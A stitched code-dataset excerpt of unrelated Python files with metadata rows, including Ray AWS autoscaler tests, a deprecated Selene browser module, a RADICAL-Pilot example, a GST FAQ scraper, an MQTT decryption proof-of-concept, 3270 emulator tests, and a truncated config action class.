def __init__(self, interaction, *args, sequence=(), **kwargs):
(super().__init__)(*args, **kwargs)
self.interaction = interaction
self.sequence = sequence
def _run(self, timeline):
obj = self.interaction.get_participant(self.enter_carry_while_holding.carry_obj_participant_type)
source_sim = self.interaction.get_participant(self.exit_carry_while_holding.sim_participant_type)
target_sim = self.interaction.get_participant(self.enter_carry_while_holding.sim_participant_type)
def _add_reservation_clobberer(_):
obj.add_reservation_clobberer(source_sim, target_sim)
def _remove_reservation_clobberer(_):
obj.remove_reservation_clobberer(source_sim, target_sim)
sequence = self.enter_carry_while_holding((self.interaction), sequence=(self.sequence))
sequence = self.exit_carry_while_holding((self.interaction), sequence=sequence)
sequence = element_utils.build_critical_section_with_finally(_add_reservation_clobberer, sequence, _remove_reservation_clobberer)
return timeline.run_child(sequence) | 57.197368 | 355 | 0.673995 |
acf6c2d628c2eb813a2f4e4f83b0734208ff9b63 | 7,157 | py | Python | python/ray/tests/aws/test_autoscaler_aws.py | Crissman/ray | 2092b097eab41b118a117fdfadd0fe664db41f63 | [
"Apache-2.0"
] | 3 | 2021-06-22T19:57:41.000Z | 2021-06-23T07:16:44.000Z | python/ray/tests/aws/test_autoscaler_aws.py | h453693821/ray | 9eb79727aa6ad94b01f8b660b83e1182555a89f6 | [
"Apache-2.0"
] | 72 | 2021-02-06T08:07:16.000Z | 2022-03-26T07:17:49.000Z | python/ray/tests/aws/test_autoscaler_aws.py | h453693821/ray | 9eb79727aa6ad94b01f8b660b83e1182555a89f6 | [
"Apache-2.0"
] | 2 | 2021-05-05T21:05:16.000Z | 2021-06-22T21:16:03.000Z | import pytest
from ray.autoscaler._private.aws.config import _get_vpc_id_or_die, \
bootstrap_aws, \
DEFAULT_AMI
import ray.tests.aws.utils.stubs as stubs
import ray.tests.aws.utils.helpers as helpers
from ray.tests.aws.utils.constants import AUX_SUBNET, DEFAULT_SUBNET, \
DEFAULT_SG_AUX_SUBNET, DEFAULT_SG, DEFAULT_SG_DUAL_GROUP_RULES, \
DEFAULT_SG_WITH_RULES_AUX_SUBNET, AUX_SG, \
DEFAULT_SG_WITH_NAME, DEFAULT_SG_WITH_NAME_AND_RULES, CUSTOM_IN_BOUND_RULES
def test_create_sg_different_vpc_same_rules(iam_client_stub, ec2_client_stub):
# use default stubs to skip ahead to security group configuration
stubs.skip_to_configure_sg(ec2_client_stub, iam_client_stub)
# given head and worker nodes with custom subnets defined...
# expect to first describe the worker subnet ID
stubs.describe_subnets_echo(ec2_client_stub, AUX_SUBNET)
# expect to second describe the head subnet ID
stubs.describe_subnets_echo(ec2_client_stub, DEFAULT_SUBNET)
# given no existing security groups within the VPC...
stubs.describe_no_security_groups(ec2_client_stub)
# expect to first create a security group on the worker node VPC
stubs.create_sg_echo(ec2_client_stub, DEFAULT_SG_AUX_SUBNET)
# expect new worker security group details to be retrieved after creation
stubs.describe_sgs_on_vpc(
ec2_client_stub,
[AUX_SUBNET["VpcId"]],
[DEFAULT_SG_AUX_SUBNET],
)
# expect to second create a security group on the head node VPC
stubs.create_sg_echo(ec2_client_stub, DEFAULT_SG)
# expect new head security group details to be retrieved after creation
stubs.describe_sgs_on_vpc(
ec2_client_stub,
[DEFAULT_SUBNET["VpcId"]],
[DEFAULT_SG],
)
# given no existing default head security group inbound rules...
# expect to authorize all default head inbound rules
stubs.authorize_sg_ingress(
ec2_client_stub,
DEFAULT_SG_DUAL_GROUP_RULES,
)
# given no existing default worker security group inbound rules...
# expect to authorize all default worker inbound rules
stubs.authorize_sg_ingress(
ec2_client_stub,
DEFAULT_SG_WITH_RULES_AUX_SUBNET,
)
# given our mocks and an example config file as input...
# expect the config to be loaded, validated, and bootstrapped successfully
config = helpers.bootstrap_aws_example_config_file("example-subnets.yaml")
# expect the bootstrapped config to show different head and worker security
# groups residing on different subnets
assert config["head_node"]["SecurityGroupIds"] == [DEFAULT_SG["GroupId"]]
assert config["head_node"]["SubnetIds"] == [DEFAULT_SUBNET["SubnetId"]]
assert config["worker_nodes"]["SecurityGroupIds"] == [AUX_SG["GroupId"]]
assert config["worker_nodes"]["SubnetIds"] == [AUX_SUBNET["SubnetId"]]
# expect no pending responses left in IAM or EC2 client stub queues
iam_client_stub.assert_no_pending_responses()
ec2_client_stub.assert_no_pending_responses()
def test_create_sg_with_custom_inbound_rules_and_name(iam_client_stub,
ec2_client_stub):
# use default stubs to skip ahead to security group configuration
stubs.skip_to_configure_sg(ec2_client_stub, iam_client_stub)
# expect to describe the head subnet ID
stubs.describe_subnets_echo(ec2_client_stub, DEFAULT_SUBNET)
# given no existing security groups within the VPC...
stubs.describe_no_security_groups(ec2_client_stub)
# expect to create a security group on the head node VPC
stubs.create_sg_echo(ec2_client_stub, DEFAULT_SG_WITH_NAME)
# expect new head security group details to be retrieved after creation
stubs.describe_sgs_on_vpc(
ec2_client_stub,
[DEFAULT_SUBNET["VpcId"]],
[DEFAULT_SG_WITH_NAME],
)
# given custom existing default head security group inbound rules...
# expect to authorize both default and custom inbound rules
stubs.authorize_sg_ingress(
ec2_client_stub,
DEFAULT_SG_WITH_NAME_AND_RULES,
)
# given the prior modification to the head security group...
# expect the next read of a head security group property to reload it
stubs.describe_sg_echo(ec2_client_stub, DEFAULT_SG_WITH_NAME_AND_RULES)
_get_vpc_id_or_die.cache_clear()
# given our mocks and an example config file as input...
# expect the config to be loaded, validated, and bootstrapped successfully
config = helpers.bootstrap_aws_example_config_file(
"example-security-group.yaml")
# expect the bootstrapped config to have the custom security group...
# name and in bound rules
assert config["provider"]["security_group"][
"GroupName"] == DEFAULT_SG_WITH_NAME_AND_RULES["GroupName"]
assert config["provider"]["security_group"][
"IpPermissions"] == CUSTOM_IN_BOUND_RULES
# expect no pending responses left in IAM or EC2 client stub queues
iam_client_stub.assert_no_pending_responses()
ec2_client_stub.assert_no_pending_responses()
def test_subnet_given_head_and_worker_sg(iam_client_stub, ec2_client_stub):
stubs.configure_iam_role_default(iam_client_stub)
stubs.configure_key_pair_default(ec2_client_stub)
# list a security group and a thousand subnets in different vpcs
stubs.describe_a_security_group(ec2_client_stub, DEFAULT_SG)
stubs.describe_a_thousand_subnets_in_different_vpcs(ec2_client_stub)
config = helpers.bootstrap_aws_example_config_file(
"example-head-and-worker-security-group.yaml")
# check that just the single subnet in the right vpc is filled
assert config["head_node"]["SubnetIds"] == [DEFAULT_SUBNET["SubnetId"]]
assert config["worker_nodes"]["SubnetIds"] == [DEFAULT_SUBNET["SubnetId"]]
# expect no pending responses left in IAM or EC2 client stub queues
iam_client_stub.assert_no_pending_responses()
ec2_client_stub.assert_no_pending_responses()
def test_fills_out_amis(iam_client_stub, ec2_client_stub):
# Setup stubs to mock out boto3
stubs.configure_iam_role_default(iam_client_stub)
stubs.configure_key_pair_default(ec2_client_stub)
stubs.describe_a_security_group(ec2_client_stub, DEFAULT_SG)
stubs.configure_subnet_default(ec2_client_stub)
config = helpers.load_aws_example_config_file("example-full.yaml")
del config["head_node"]["ImageId"]
del config["worker_nodes"]["ImageId"]
# Pass in SG for stub to work
config["head_node"]["SecurityGroupIds"] = ["sg-1234abcd"]
config["worker_nodes"]["SecurityGroupIds"] = ["sg-1234abcd"]
defaults_filled = bootstrap_aws(config)
ami = DEFAULT_AMI.get(config.get("provider", {}).get("region"))
assert defaults_filled["head_node"].get("ImageId") == ami
assert defaults_filled["worker_nodes"].get("ImageId") == ami
iam_client_stub.assert_no_pending_responses()
ec2_client_stub.assert_no_pending_responses()
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
| 42.60119 | 79 | 0.739695 |
acf6c37587ca91c5bec4001860a9c4c30856b279 | 6,575 | py | Python | selene/browser.py | kianku/selene | 5361938e4f34d6cfae6df3aeca80e06a3e657d8c | [
"MIT"
] | null | null | null | selene/browser.py | kianku/selene | 5361938e4f34d6cfae6df3aeca80e06a3e657d8c | [
"MIT"
] | null | null | null | selene/browser.py | kianku/selene | 5361938e4f34d6cfae6df3aeca80e06a3e657d8c | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2015-2020 Iakiv Kramarenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import warnings
from typing import Union
from selenium.webdriver.remote.webdriver import WebDriver
from selene.core.entity import Collection, Element
from selene.core.configuration import Config
from selene.support.shared import browser
# todo: just remove this file, once deprecation is totally applied
def driver() -> WebDriver:
warnings.warn('selene.browser.driver is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.config.driver
def quit():
warnings.warn('selene.browser.quit is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
browser.quit()
def quit_driver():
warnings.warn('selene.browser.quit_driver is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
browser.quit()
def close():
warnings.warn('selene.browser.close is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
browser.close_current_tab()
def set_driver(webdriver: WebDriver):
warnings.warn('selene.browser.set_driver is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
# noinspection PyDataclass
browser.config.driver = webdriver # todo: test it
def open(absolute_or_relative_url):
warnings.warn('selene.browser.open is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.open(absolute_or_relative_url)
def open_url(absolute_or_relative_url):
warnings.warn('selene.browser.open_url is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.open(absolute_or_relative_url)
def element(css_or_xpath_or_by: Union[str, tuple]) -> Element:
warnings.warn('selene.browser.element is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.element(css_or_xpath_or_by)
def elements(css_or_xpath_or_by: Union[str, tuple]) -> Collection:
warnings.warn('selene.browser.elements is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.all(css_or_xpath_or_by)
def all(css_or_xpath_or_by: Union[str, tuple]) -> Collection:
warnings.warn('selene.browser.all is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.all(css_or_xpath_or_by)
def take_screenshot(path=None, filename=None):
warnings.warn('selene.browser.take_screenshot is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.take_screenshot(path, filename)
def save_screenshot(file):
warnings.warn('selene.browser.save_screenshot is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.save_screenshot(file)
def save_page_source(file):
warnings.warn('selene.browser.save_page_source is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.save_page_source(file)
def latest_screenshot():
warnings.warn('selene.browser.latest_screenshot is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser._latest_screenshot
def latest_page_source():
warnings.warn('selene.browser.latest_page_source is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser._latest_page_source
def wait_to(webdriver_condition, timeout=None, polling=None):
warnings.warn('selene.browser.wait_to is deprecated, '
'use `from selene.support.shared import browser` import, '
'and also use browser.should style',
DeprecationWarning)
tuned_browser = browser if timeout is None else browser.with_(Config(timeout=timeout))
return tuned_browser.should(webdriver_condition)
def should(webdriver_condition, timeout=None, polling=None):
warnings.warn('selene.browser.should is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
tuned_browser = browser if timeout is None else browser.with_(Config(timeout=timeout))
return tuned_browser.should(webdriver_condition)
def execute_script(script, *args):
warnings.warn('selene.browser.execute_script is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.driver.execute_script(script, *args)
def title():
warnings.warn('selene.browser.title is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.driver.title
| 37.571429 | 90 | 0.696122 |
acf6c3fefcdde7a4c3ce8d65bc92cd25646cd54c | 4,770 | py | Python | examples/probing.py | karahbit/radical.pilot | c611e1df781749deef899dcf5815728e1d8a962e | [
"MIT"
] | null | null | null | examples/probing.py | karahbit/radical.pilot | c611e1df781749deef899dcf5815728e1d8a962e | [
"MIT"
] | null | null | null | examples/probing.py | karahbit/radical.pilot | c611e1df781749deef899dcf5815728e1d8a962e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
__copyright__ = 'Copyright 2013-2014, http://radical.rutgers.edu'
__license__ = 'MIT'
import os
import sys
import radical.pilot as rp
import radical.utils as ru
dh = ru.DebugHelper()
# ------------------------------------------------------------------------------
#
# READ the RADICAL-Pilot documentation: https://radicalpilot.readthedocs.io/
#
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
#
if __name__ == '__main__':
# we use a reporter class for nicer output
report = ru.Reporter(name='radical.pilot')
report.title('Getting Started (RP version %s)' % rp.version)
# use the resource specified as argument, fall back to localhost
if len(sys.argv) > 3: report.exit('Usage:\t%s [resource]\n\n' % sys.argv[0])
elif len(sys.argv) == 2: resource = sys.argv[1]
else : resource = 'local.localhost'
# Create a new session. No need to try/except this: if session creation
# fails, there is not much we can do anyways...
session = rp.Session()
# all other pilot code is now tried/excepted. If an exception is caught, we
# can rely on the session object to exist and be valid, and we can thus tear
# the whole RP stack down via a 'session.close()' call in the 'finally'
# clause...
try:
# read the config used for resource details
report.info('read config')
config = ru.read_json('%s/config.json' % os.path.dirname(__file__))
report.ok('>>ok\n')
report.header('submit pilots')
# Add a Pilot Manager. Pilot managers manage one or more ComputePilots.
pmgr = rp.PilotManager(session=session)
# Define an [n]-core local pilot that runs for [x] minutes
# Here we use a dict to initialize the description object
pd_init = {'resource' : resource,
'runtime' : 15, # pilot runtime (min)
'exit_on_error' : True,
'project' : config[resource]['project'],
'queue' : config[resource]['queue'],
'access_schema' : config[resource]['schema'],
'cores' : config[resource]['cores']
}
pdesc = rp.ComputePilotDescription(pd_init)
# Launch the pilot.
pilot = pmgr.submit_pilots(pdesc)
report.header('submit units')
# Register the ComputePilot in a UnitManager object.
umgr = rp.UnitManager(session=session)
umgr.add_pilots(pilot)
# Create a workload of ComputeUnits.
# Each compute unit runs '/bin/date'.
n = 10 # number of units to run
report.info('create %d unit description(s)\n\t' % n)
cuds = list()
for i in range(0, n):
# create a new CU description, and fill it.
# Here we don't use dict initialization.
cud = rp.ComputeUnitDescription()
cud.executable = 'df'
cud.argument = ['/tmp/','>','$hostname.txt']
cud.gpu_processes = 0
cud.cpu_processes = 1
cud.cpu_threads = sys.argv[2]
# to ensure each CU lands on own node
# cud.cpu_process_type = rp.MPI
# cud.cpu_thread_type = rp.OpenMP
cuds.append(cud)
report.progress()
report.ok('>>ok\n')
# Submit the previously created ComputeUnit descriptions to the
# PilotManager. This will trigger the selected scheduler to start
# assigning ComputeUnits to the ComputePilots.
umgr.submit_units(cuds)
# Wait for all compute units to reach a final state (DONE, CANCELED or FAILED).
report.header('gather results')
umgr.wait_units()
except Exception as e:
# Something unexpected happened in the pilot code above
report.error('caught Exception: %s\n' % e)
ru.print_exception_trace()
raise
except (KeyboardInterrupt, SystemExit):
# the callback called sys.exit(), and we can here catch the
# corresponding KeyboardInterrupt exception for shutdown. We also catch
# SystemExit (which gets raised if the main threads exits for some other
# reason).
ru.print_exception_trace()
report.warn('exit requested\n')
finally:
# always clean up the session, no matter if we caught an exception or
# not. This will kill all remaining pilots.
report.header('finalize')
session.close(download=True)
report.header()
# ------------------------------------------------------------------------------
| 35.864662 | 87 | 0.563103 |
acf6c424f73d8811e3fc433cd50fe22eb0cac933 | 136 | py | Python | code/check_tf.py | getnexar/VPE | b600a0a9ef0579325fb58f07ddb13d1733dbe459 | [
"MIT"
] | null | null | null | code/check_tf.py | getnexar/VPE | b600a0a9ef0579325fb58f07ddb13d1733dbe459 | [
"MIT"
] | null | null | null | code/check_tf.py | getnexar/VPE | b600a0a9ef0579325fb58f07ddb13d1733dbe459 | [
"MIT"
] | 1 | 2020-06-22T18:37:22.000Z | 2020-06-22T18:37:22.000Z | import tensorflow as tf
import torch
pip install torch===1.5.0 torchvision===0.6.0 -f https://download.pytorch.org/whl/torch_stable.html | 45.333333 | 99 | 0.779412 |
acf6c4fdd83b10f9e9ab97856cc4fecb07605c84 | 1,567 | py | Python | src/data/gst_scrapper.py | souvik-mishra/FAQChatbot | f1859103e9d347b6e40bebee7d6d268f8a5b1afd | [
"MIT"
] | 28 | 2019-05-27T03:06:30.000Z | 2022-03-31T21:55:50.000Z | src/data/gst_scrapper.py | yogeshhk/faqbotplatform | f1859103e9d347b6e40bebee7d6d268f8a5b1afd | [
"MIT"
] | 3 | 2020-03-30T07:48:25.000Z | 2021-04-22T02:02:46.000Z | src/data/gst_scrapper.py | souvik-mishra/FAQChatbot | f1859103e9d347b6e40bebee7d6d268f8a5b1afd | [
"MIT"
] | 17 | 2019-06-15T08:12:19.000Z | 2022-03-24T04:13:12.000Z | # -*- coding: utf-8 -*-
# Ref: http://srome.github.io/Parsing-HTML-Tables-in-Python-with-BeautifulSoup-and-pandas/
import requests
import pandas as pd
from bs4 import BeautifulSoup
class HTMLTableParser:
def parse_url(self, url):
response = requests.get(url)
soup = BeautifulSoup(response.text, 'lxml')
return [self.parse_html_table(table) for table in soup.find_all('table') if table.has_attr('id')]
def parse_html_table(self, table):
n_columns = 3 # hardcoded
rows = table.find_all('tr')
n_rows= len(rows)
header_row = rows[0]
column_names = [col.get_text() for col in header_row.find_all('td')]
df = pd.DataFrame(columns = column_names,index= range(0,n_rows))
for i in range(1,n_rows):
row_values = [col.get_text() for col in rows[i].find_all('td')]
if len(row_values) <3:
continue
question_text = row_values[1]
answer_text = row_values[2]
answer_text = answer_text.splitlines()[0]
if len(answer_text) > 10:
answer_text = answer_text.split(' ', 1)[1]
df.iloc[i-1,0] = question_text
df.iloc[i-1,1] = answer_text
return df
if __name__ == "__main__":
hp = HTMLTableParser()
url = "https://cbec-gst.gov.in/faq.html"
tables = hp.parse_url(url)
total_df = pd.concat(tables, axis=0)
total_df.to_csv("scrapedfaq.csv",index=False)
| 33.340426 | 107 | 0.579451 |
acf6c5b13015c957c7b01454f637f18a505143fc | 1,668 | py | Python | cheater.py | alexismarquet/MSE-TM-PoC | a104fc54c3064ed33399010fdff81e0f158ad9f8 | [
"MIT"
] | null | null | null | cheater.py | alexismarquet/MSE-TM-PoC | a104fc54c3064ed33399010fdff81e0f158ad9f8 | [
"MIT"
] | null | null | null | cheater.py | alexismarquet/MSE-TM-PoC | a104fc54c3064ed33399010fdff81e0f158ad9f8 | [
"MIT"
] | null | null | null | import paho.mqtt.client as mqtt
import time
import argparse
from tinydb import TinyDB, Query
from Crypto.Cipher import AES
from measure import Measure
import logging
import sys
# Init args parser
parser = argparse.ArgumentParser(description="Process some integers.")
parser.add_argument(
"MQTT_broker", metavar="MQTT_broker", type=str, help="Address of the MQTT broker"
)
parser.add_argument("SF_key", metavar="Sf", type=str, help="Swarm shared secret")
args = parser.parse_args()
# init logging facility
logFormatter = logging.Formatter(
"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s"
)
logger = logging.getLogger()
fileHandler = logging.FileHandler("{0}/{1}.log".format("log", f"cheater"))
fileHandler.setFormatter(logFormatter)
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logFormatter)
logger.addHandler(consoleHandler)
logger.setLevel(logging.DEBUG)
# init decipher
decipher = AES.new(args.SF_key, AES.MODE_ECB)
# on receive message
def on_message(client, userdata, message):
logger.debug("rcvd: " + message.topic + "/" + str(message.payload.decode("utf-8")))
if message.topic == "addToPool":
as_bytes = bytes.fromhex(message.payload.decode("utf-8"))
res = decipher.decrypt(as_bytes)
m = Measure("none")
m.unpack(res)
logger.info(m)
# decrypt
logger.info(f"Connecting to broker at {args.MQTT_broker}")
client = mqtt.Client("Cheater")
client.connect(args.MQTT_broker)
client.loop_start()
client.subscribe("addToPool")
client.on_message = on_message
while True:
time.sleep(1)
client.loop_stop()
| 26.47619 | 87 | 0.733813 |
acf6c6f37de0e8d7494fc964d4da9b85b6567be4 | 5,074 | py | Python | utest/py3270/test_emulator.py | MichaelSeeburger/Robot-Framework-Mainframe-3270-Library | 76b589d58c55a39f96c027a8ae28c41fa37ed445 | [
"MIT"
] | 3 | 2018-10-02T14:32:06.000Z | 2018-10-02T14:33:32.000Z | utest/py3270/test_emulator.py | MichaelSeeburger/Robot-Framework-Mainframe-3270-Library | 76b589d58c55a39f96c027a8ae28c41fa37ed445 | [
"MIT"
] | null | null | null | utest/py3270/test_emulator.py | MichaelSeeburger/Robot-Framework-Mainframe-3270-Library | 76b589d58c55a39f96c027a8ae28c41fa37ed445 | [
"MIT"
] | null | null | null | import errno
import os
import pytest
from Mainframe3270.py3270 import Emulator, TerminatedError
CURDIR = os.path.dirname(os.path.realpath(__file__))
@pytest.fixture
def mock_windows(mocker):
mocker.patch("Mainframe3270.py3270.os_name", "nt")
@pytest.fixture
def mock_posix(mocker):
mocker.patch("Mainframe3270.py3270.os_name", "posix")
mocker.patch("subprocess.Popen")
def test_emulator_default_args(mock_windows):
under_test = Emulator()
assert under_test.app.executable == "ws3270"
assert under_test.app.args == ["-xrm", "ws3270.unlockDelay: False"]
def test_emulator_visible(mock_windows):
under_test = Emulator(visible=True)
assert under_test.app.executable == "wc3270"
assert under_test.app.args == [
"-xrm",
"wc3270.unlockDelay: False",
"-xrm",
"wc3270.model: 2",
]
def test_emulator_none_windows(mock_posix):
under_test = Emulator()
assert under_test.app.executable == "s3270"
def test_emulator_none_windows_visible(mock_posix):
under_test = Emulator(visible=True)
assert under_test.app.executable == "x3270"
def test_emulator_with_extra_args_oneline(mock_windows):
extra_args = os.path.join(CURDIR, "resources/argfile_oneline.txt")
under_test = Emulator(extra_args=extra_args)
args_from_file = ["--charset", "german"]
assert all(arg in under_test.app.args for arg in args_from_file)
assert under_test.app.args > args_from_file
def test_emulator_none_windows_extra_args_oneline(mock_posix):
extra_args = os.path.join(CURDIR, "resources/argfile_oneline.txt")
under_test = Emulator(extra_args=extra_args)
args_from_file = ["--charset", "german"]
assert all(arg in under_test.app.args for arg in args_from_file)
assert under_test.app.args > args_from_file
def test_emulator_with_extra_args_multiline(mock_windows):
extra_args = os.path.join(CURDIR, "resources/argfile_multiline.txt")
under_test = Emulator(extra_args=extra_args)
args_from_file = ["--charset", "bracket", "--accepthostname", "myhost.com"]
assert all(arg in under_test.app.args for arg in args_from_file)
assert under_test.app.args > args_from_file
def test_emulator_with_extra_args_multiline_comments(mock_windows):
extra_args = os.path.join(CURDIR, "resources/argfile_multiline_comments.txt")
under_test = Emulator(extra_args=extra_args)
args_from_file = ["--charset", "bracket", "--accepthostname", "myhost.com"]
assert all(arg in under_test.app.args for arg in args_from_file)
assert "comment" not in under_test.app.args
def test_emulator_with_extra_args(mock_windows):
extra_args = ["--cadir", "/path/to/ca_dir"]
under_test = Emulator(extra_args=extra_args)
assert all(arg in under_test.app.args for arg in extra_args)
assert under_test.app.args > extra_args
def test_exec_command_when_is_terminated(mock_windows, mocker):
under_test = Emulator()
under_test.is_terminated = True
with pytest.raises(
TerminatedError, match="This Emulator instance has been terminated"
):
under_test.exec_command(b"abc")
def test_terminate_BrokenPipeError(mock_windows, mocker):
mocker.patch("Mainframe3270.py3270.ExecutableAppWin.close")
mocker.patch(
"Mainframe3270.py3270.Emulator.exec_command", side_effect=BrokenPipeError
)
under_test = Emulator()
under_test.terminate()
assert under_test.is_terminated
def test_terminate_socket_error(mock_windows, mocker):
mock_os_error = OSError()
mock_os_error.errno = errno.ECONNRESET
mocker.patch("Mainframe3270.py3270.ExecutableAppWin.close")
mocker.patch(
"Mainframe3270.py3270.Emulator.exec_command", side_effect=mock_os_error
)
under_test = Emulator()
under_test.terminate()
under_test.is_terminated = True
def test_terminate_other_socket_error(mock_windows, mocker):
mocker.patch("Mainframe3270.py3270.ExecutableAppWin.close")
mocker.patch("Mainframe3270.py3270.Emulator.exec_command", side_effect=OSError)
under_test = Emulator()
with pytest.raises(OSError):
under_test.terminate()
def test_is_connected(mock_windows, mocker):
mocker.patch("Mainframe3270.py3270.ExecutableAppWin.write")
mocker.patch(
"Mainframe3270.py3270.ExecutableAppWin.readline",
side_effect=[
b"data: abc",
b"U U U C(pub400.com) C 4 43 80 4 24 0x0 0.000",
b"ok",
],
)
under_test = Emulator()
assert under_test.is_connected()
def test_is_not_connected(mock_windows, mocker):
mocker.patch("Mainframe3270.py3270.ExecutableAppWin.write")
mocker.patch(
"Mainframe3270.py3270.ExecutableAppWin.readline",
side_effect=[
b"data: abc",
b"U U U N C 4 43 80 4 24 0x0 0.000",
b"ok",
],
)
under_test = Emulator()
assert not under_test.is_connected()
def test_is_connected_NotConnectedException(mock_windows):
under_test = Emulator()
assert not under_test.is_connected()
| 28.188889 | 83 | 0.721916 |
acf6c7911a3a0491c63c2ba632b5880a4413440b | 24,745 | py | Python | python2/ltk/actions/config_action.py | Lingotek/filesystem-connector | deca4cd2af41ee7a831404698eb1da70018c3556 | [
"MIT"
] | 11 | 2016-05-27T19:44:17.000Z | 2018-11-14T15:54:10.000Z | python2/ltk/actions/config_action.py | Lingotek/filesystem-connector | deca4cd2af41ee7a831404698eb1da70018c3556 | [
"MIT"
] | 10 | 2018-02-01T17:52:00.000Z | 2022-03-17T21:28:17.000Z | python2/ltk/actions/config_action.py | Lingotek/filesystem-connector | deca4cd2af41ee7a831404698eb1da70018c3556 | [
"MIT"
] | 6 | 2016-05-10T21:56:50.000Z | 2022-02-17T08:30:47.000Z | from ltk.actions.action import *
from tabulate import tabulate
class ConfigAction(Action):
def __init__(self, path):
Action.__init__(self, path)
self.config_file_name, self.conf_parser = self.init_config_file()
self.print_config = True
def config_action(self, **kwargs):
try:
if 'locale' in kwargs and kwargs['locale']:
self.set_locale(kwargs['locale'])
if 'workflow_id' in kwargs and kwargs['workflow_id']:
self.set_workflow_id(kwargs['workflow_id'])
if 'download_folder' in kwargs and kwargs['download_folder']:
self.set_download_folder(kwargs['download_folder'])
if 'latest_document' in kwargs and kwargs['latest_document']:
self.set_always_check_latest_doc(kwargs['latest_document'])
if 'clone_option' in kwargs and kwargs['clone_option']:
self.set_clone_option(kwargs['clone_option'])
if 'finalized_file' in kwargs and kwargs['finalized_file']:
self.set_finalized_file_option(kwargs['finalized_file'])
if 'unzip_file' in kwargs and kwargs['unzip_file']:
self.set_unzip_file_option(kwargs['unzip_file'])
if 'target_locales' in kwargs and kwargs['target_locales']:
self.set_target_locales(kwargs['target_locales'])
if 'locale_folder' in kwargs and kwargs['locale_folder']:
self.set_locale_folder(kwargs['locale_folder'])
if 'remove_locales' in kwargs and kwargs['remove_locales']:
self.remove_locales(kwargs['remove_locales'])
self.update_config_parser_info()
if 'git' in kwargs and kwargs['git']:
self.set_git_autocommit(kwargs['git'])
if 'git_credentials' in kwargs and kwargs['git_credentials']:
self.set_git_credentials()
if 'append_option' in kwargs and kwargs['append_option']:
self.set_append_option(kwargs['append_option'])
if 'auto_format' in kwargs and kwargs['auto_format']:
self.set_auto_format_option(kwargs['auto_format'])
if 'metadata_prompt' in kwargs and kwargs['metadata_prompt']:
self.set_metadata_prompt(kwargs['metadata_prompt'])
if 'metadata_fields' in kwargs and kwargs['metadata_fields']:
self.set_metadata_fields(kwargs['metadata_fields'])
if 'metadata_defaults' in kwargs and kwargs['metadata_defaults']: #handle this last in case a prior argument caused an error
self.set_metadata_defaults()
self.print_output()
except Exception as e:
log_error(self.error_file_name, e)
if 'string indices must be integers' in str(e) or 'Expecting value: line 1 column 1' in str(e):
logger.error("Error connecting to Lingotek's TMS")
else:
logger.error("Error on config: "+str(e))
def print_output(self):
download_dir = "None"
if self.download_dir and str(self.download_dir) != 'null':
download_dir = self.download_dir
locale_folders_str = "None"
if self.locale_folders:
locale_folders_str = json.dumps(self.locale_folders).replace("{","").replace("}","").replace("_","-")
current_git_username = self.conf_parser.get('main', 'git_username')
current_git_password = self.conf_parser.get('main', 'git_password')
git_output = ('active' if self.git_autocommit in ['True', 'on'] else 'inactive')
if self.git_autocommit in ['True', 'on']:
if current_git_username != "":
git_output += (' (' + current_git_username + ', password:' + ('YES' if current_git_password != '' else 'NO')) + ')'
else:
git_output += (' (password:YES)' if current_git_password != '' else ' (no credentials set, recommend SSH key)')
if self.print_config:
watch_locales = set()
for locale in self.watch_locales:
watch_locales.add(locale.replace('_','-'))
watch_locales = ','.join(target for target in watch_locales)
if str(watch_locales) == "[]" or not watch_locales:
watch_locales = "None"
""" print ('Host: {0}\nLingotek Project: {1} ({2})\nLocal Project Path: {3}\nCommunity ID: {4}\nWorkflow ID: {5}\n'
'Default Source Locale: {6}\nAlways Check Latest Document: {7}\nClone Option: {8}\nDownload Finalized Files: {9}\nAuto Format: {10}\nDownload Folder: {11}\nTarget Locales: {12}\nTarget Locale Folders: {13}\nGit Auto-commit: {14}\nAppend Option: {15}'.format(
